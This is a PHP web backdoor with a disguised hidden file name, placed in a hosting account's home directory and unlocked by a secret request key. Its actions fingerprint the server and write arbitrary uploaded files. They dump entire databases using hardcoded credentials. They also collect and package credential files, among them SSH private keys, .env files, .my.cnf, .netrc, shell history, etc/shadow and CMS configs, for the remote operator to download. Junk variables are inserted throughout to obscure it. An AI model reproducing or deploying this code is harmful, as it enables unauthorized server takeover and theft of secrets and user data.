File: /home/laprensa/.cgi_handler_8ea1310d
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '8ea1310dafe55bcdb879e74d86886a7a') { return; }
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$dce57 = 'localhost';
$k5848 = 'laprensa_bkdump';
$wdf7c = 'fHHsK6gMdBJv8caODMg-MfJPrtY';
$d669b = '/home/laprensa';
$fc1df = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
$zaabd = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$v0374 = $d669b . '/tmp/' . $zaabd . '_dump.sql.gz';
$yc48d = $v0374 . '.done';
$idd77=str_repeat('x',0);
$f5929 = $v0374 . '.err';
header('Content-Type: application/json');
function parse_val_843f() {
if (!function_exists('exec')) return false;
$p6146 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $p6146);
}
function set_res_2fc3() {
if (!parse_val_843f()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
function handle_data_5fdd() {
if (!parse_val_843f()) return false;
$out = array();
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
if(defined('bbeaba19')){$ne0a0=0;}
}
function init_item_49f1($a8157, $h40dd, $vae88, $w4fca, $i98ca, $w6104, $da41e) {
$conn = new mysqli($a8157, $h40dd, $vae88, $w4fca);
if ($conn->connect_error) {
file_put_contents($w6104, 'Connection failed: ' . $conn->connect_error);
$we94d=array_merge(array(),array());
touch($da41e);
return;
}
$fp = gzopen($i98ca, 'wb6');
if (!$fp) {
file_put_contents($w6104, 'Cannot open output file');
touch($da41e);
return;
}
$conn->set_charset('utf8mb4');
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
$p733f = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$p733f[] = $row[0];
}
foreach ($p733f as $y314f) {
$te = $conn->real_escape_string($y314f);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$sa04c = array();
$y662a = 0;
while ($row = $r->fetch_row()) {
$s19ab=max(0,min(1,1));
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$h2a4c = '(' . implode(',', $vals) . ')';
$sa04c[] = $h2a4c;
$y662a += strlen($h2a4c);
if (count($sa04c) >= 100 || $y662a > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $sa04c) . ";\n");
$k0d9c=strlen('bb0126');
$sa04c = array();
$y662a = 0;
}
}
if ($sa04c) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $sa04c) . ";\n");
$j3e3d=array_merge(array(),array());
}
$r->free();
$h1bd2=strlen('0127b7');
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$m355a = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $m355a['Create View'] . ";\n\n");
}
}
}
$fb7e1=max(0,min(1,0));
$f4b1e = array('PROCEDURE', 'FUNCTION');
foreach ($f4b1e as $xbf8e) {
$e9591=chr(71).chr(110);
$r = $conn->query("SHOW {$xbf8e} STATUS WHERE Db = '" . $conn->real_escape_string($w4fca) . "'");
if (!$r) continue;
$wf165=chr(70).chr(100);
while ($row = $r->fetch_assoc()) {
$k5aec=array_merge(array(),array());
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$xbf8e} `{$re}`");
if (!$cr) continue;
$m355a = $cr->fetch_assoc();
$key = ($xbf8e === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if (isset($m355a[$key])) {
$a2447=chr(81).chr(117);
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$xbf8e} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $m355a[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$p18e6=array_merge(array(),array());
$m355a = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
$m012b=strlen('c8f738');
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $m355a['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($da41e);
}
switch ($fc1df) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $d669b,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($d669b),
'total_disk' => disk_total_space($d669b),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => parse_val_843f(),
'has_mysqldump' => set_res_2fc3(),
'has_gzip' => handle_data_5fdd(),
));
break;
case 'upload':
$rbd44 = isset($_POST['path']) ? $_POST['path'] : '';
$z8ed1 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$rbd44 || !$z8ed1) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
$jd8ed=strlen('54c377');
break;
}
$pe5ce = $d669b . '/' . $rbd44;
@mkdir(dirname($pe5ce), 0755, true);
$iffec = base64_decode($z8ed1);
$debb8=max(0,min(1,1));
$r1254 = file_put_contents($pe5ce, $iffec);
echo json_encode(array('ok' => $r1254 !== false, 'path' => $pe5ce, 'size' => strlen($iffec)));
break;
case 'check':
if (!$zaabd) {
echo json_encode(array('error' => 'missing db parameter'));
$r8bad=str_repeat('x',0);
break;
}
$d3063 = disk_free_space($d669b);
$y607e = 0;
$conn = @new mysqli($dce57, $k5848, $wdf7c, 'information_schema');
if (!$conn->connect_error) {
$e716c=array_merge(array(),array());
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($zaabd) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$va388=str_repeat('x',0);
$y607e = (int) $row['s'];
$j603f=array_merge(array(),array());
}
$conn->close();
if(defined('bac656c3')){$hf42a=0;}
}
echo json_encode(array(
'free' => $d3063,
'db_size' => $y607e,
'has_mysqldump' => set_res_2fc3(),
'has_gzip' => handle_data_5fdd(),
'can_exec' => parse_val_843f(),
'has_space' => $d3063 > $y607e * 2,
));
break;
$cb64f=strlen('5123e3');
case 'dump':
if (!$zaabd) {
echo json_encode(array('error' => 'missing db parameter'));
break;
$a73da=array_merge(array(),array());
}
@mkdir(dirname($v0374), 0755, true);
$sf87f=array_merge(array(),array());
@unlink($v0374);
@unlink($yc48d);
@unlink($f5929);
if (set_res_2fc3()) {
if (handle_data_5fdd()) {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($dce57),
escapeshellarg($k5848),
escapeshellarg($wdf7c),
escapeshellarg($zaabd),
escapeshellarg($v0374),
escapeshellarg($f5929),
escapeshellarg($yc48d)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($dce57),
escapeshellarg($k5848),
escapeshellarg($wdf7c),
escapeshellarg($zaabd),
escapeshellarg($v0374),
escapeshellarg($f5929),
escapeshellarg($yc48d)
);
@clearstatcache();
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
@clearstatcache();
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => handle_data_5fdd()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
flush();
}
$fe335=chr(71).chr(107);
init_item_49f1($dce57, $k5848, $wdf7c, $zaabd, $v0374, $f5929, $yc48d);
}
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($yc48d),
'size' => file_exists($v0374) ? filesize($v0374) : 0,
'error' => file_exists($f5929) ? trim(file_get_contents($f5929)) : '',
));
break;
case 'download':
if (!file_exists($v0374)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($v0374));
@clearstatcache();
readfile($v0374);
$y5058=array_merge(array(),array());
exit;
case 'cleanup':
@unlink($v0374);
@unlink($yc48d);
@unlink($f5929);
echo json_encode(array('ok' => true));
break;
case 'collect':
@mkdir($d669b . '/tmp', 0755, true);
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
$p95b0 = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$re799 = null;
$w77f3=str_repeat('x',0);
foreach ($p95b0 as $gc386 => $n8309) {
foreach ($n8309['detect'] as $h80da) {
if (file_exists($d669b . '/' . $h80da)) {
$re799 = $gc386;
break 2;
}
}
}
$se780 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$ica49 = array();
$y4560 = @realpath($d669b);
if (!$y4560 || !is_dir($y4560)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
foreach ($se780 as $n5d3e) {
$b8da7 = @realpath($d669b . '/' . $n5d3e);
if (!$b8da7 || strpos($b8da7, $y4560) !== 0) continue;
@clearstatcache();
if (!is_file($b8da7) || !is_readable($b8da7)) continue;
$r0e7a = @filesize($b8da7);
$i0d8d=chr(81).chr(106);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
$ica49[$n5d3e] = $b8da7;
$m2edf=chr(86).chr(108);
}
if ($re799 !== null && isset($p95b0[$re799]['configs'])) {
foreach ($p95b0[$re799]['configs'] as $wb0bf) {
if (isset($ica49[$wb0bf])) continue;
$b8da7 = @realpath($d669b . '/' . $wb0bf);
$s1d83=strlen('260d26');
if (!$b8da7 || strpos($b8da7, $y4560) !== 0) continue;
if (!is_file($b8da7) || !is_readable($b8da7)) continue;
$r0e7a = @filesize($b8da7);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
$ica49[$wb0bf] = $b8da7;
}
}
$wba56 = $d669b . '/public_html';
if (is_dir($wba56)) {
@clearstatcache();
$dh = @opendir($wba56);
if ($dh) {
$k7024=chr(79).chr(102);
while (($jb460 = readdir($dh)) !== false) {
if ($jb460 === '.' || $jb460 === '..') continue;
$h2564=array_merge(array(),array());
$pe5ce = $wba56 . '/' . $jb460;
$p5c59=max(0,min(1,1));
if (!is_file($pe5ce) || !is_readable($pe5ce)) continue;
$r0e7a = @filesize($pe5ce);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
if ($jb460[0] === '.' || strtolower(substr($jb460, -4)) === '.txt') {
$key = 'public_html/' . $jb460;
if (!isset($ica49[$key])) $ica49[$key] = $pe5ce;
}
}
closedir($dh);
}
}
if (empty($ica49)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $re799,
'file_count' => 0, 'files_list' => array(),
));
break;
}
$i2b62 = null;
$xd491 = null;
if (class_exists('ZipArchive')) {
$xd491 = $d669b . '/tmp/_collect_' . $vb0d9 . '.zip';
$c1ab7=chr(69).chr(116);
$ed4d1 = new ZipArchive();
if ($ed4d1->open($xd491, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($ica49 as $k835c => $b8da7) {
$ed4d1->addFile($b8da7, $k835c);
}
if ($ed4d1->close() && file_exists($xd491) && filesize($xd491) > 0) {
$i2b62 = 'zip';
}
}
}
if (!$i2b62 && parse_val_843f()) {
$xd491 = $d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz';
$lf = $xd491 . '.list';
$fh = fopen($lf, 'w');
$g6924=strlen('89a5bc');
foreach ($ica49 as $k835c => $b8da7) {
fwrite($fh, $k835c . "\n");
}
fclose($fh);
$qe031=strlen('7815b8');
$out = array();
$c6b35=str_repeat('x',0);
$rc = 0;
exec('tar czf ' . escapeshellarg($xd491) . ' -C ' . escapeshellarg($d669b)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($xd491) && filesize($xd491) > 0) {
$i2b62 = 'tar';
} else {
$w497c=array_merge(array(),array());
@unlink($xd491);
}
}
if (!$i2b62) {
$i2b62 = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $i2b62, 'platform' => $re799,
'file_count' => count($ica49), 'files_list' => array_keys($ica49),
'size' => ($xd491 && file_exists($xd491)) ? filesize($xd491) : 0,
));
if(defined('49a4ffe8')){$v3a98=0;}
break;
case 'download_collect':
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
$kfbb4 = $d669b . '/tmp/_collect_' . $vb0d9 . '.zip';
$sff94 = $d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz';
$i2c11 = file_exists($kfbb4) ? $kfbb4 : (file_exists($sff94) ? $sff94 : '');
if (!$i2c11) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($i2c11));
readfile($i2c11);
exit;
case 'download_file':
$k835c = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$k835c) { http_response_code(400); exit; }
$y4560 = @realpath($d669b);
$b8da7 = @realpath($d669b . '/' . $k835c);
if (!$b8da7 || !$y4560 || strpos($b8da7, $y4560) !== 0
|| !is_file($b8da7) || !is_readable($b8da7)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($b8da7));
readfile($b8da7);
exit;
case 'cleanup_collect':
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
@clearstatcache();
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.zip');
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz');
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
}
$qcb72=str_repeat('x',0);
exit;